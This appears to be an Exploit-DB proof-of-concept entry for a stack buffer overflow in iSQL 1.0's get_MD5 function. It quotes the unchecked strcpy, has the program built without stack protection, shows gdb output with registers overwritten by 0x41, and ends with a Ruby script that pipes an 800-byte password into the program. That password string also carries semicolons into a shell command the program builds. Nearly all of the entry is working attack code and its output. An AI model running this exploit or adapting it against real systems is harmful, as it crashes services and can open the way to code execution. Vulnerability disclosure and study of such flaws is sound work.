iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)

EDB-ID:

39939

CVE:

N/A


Author:

HaHwul

Type:

dos


Platform:

Linux

Date:

2016-06-13


#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
 :: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable
 :: don't check str size
446 char *get_MD5(char *str){
447         FILE *stream;
448         char *buf=malloc(sizeof(char)*33);
449         char cmd[100];
450         memset(buf,'\0',sizeof(buf));
451         memset(cmd,'\0',sizeof(cmd));
452         strcpy(cmd,"echo "); //5
453         strcpy((char *)cmd+5,str);

Edit makefile > CFLAGS = -fno-stack-protector
#> make

### gdb history
(gdb) r
Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql

*************** welcome to ISQL ****************
* version 1.0                                  *
* Designed by RL                               *
* Copyright (c) 2011, RL. All rights reserved  *
************************************************

>username: hwul_test
>password: AAAAAAAAAAAAAAAAAAAAAAAAAA...  ("A" * 800)
Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()

(gdb) x/s $rax
0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>

(gdb) x/s $rbp
0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>

### Registers
(gdb) i r
rax            0x4141414141414141       4702111234474983745
rbx            0x0      0
rcx            0x7ffff7b06480   140737348920448
rdx            0x0      0
rsi            0x60b610 6338064
rdi            0x5      5
rbp            0x4141414141414141       0x4141414141414141
rsp            0x7fffffffe948   0x7fffffffe948
r8             0xffffffff       4294967295
r9             0x0    
=end
puts "iSQL 1.0 - Buffer Overflow"
puts " - by hahwul"
puts " - Run BUG.."
buffer = "A"*800 
system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")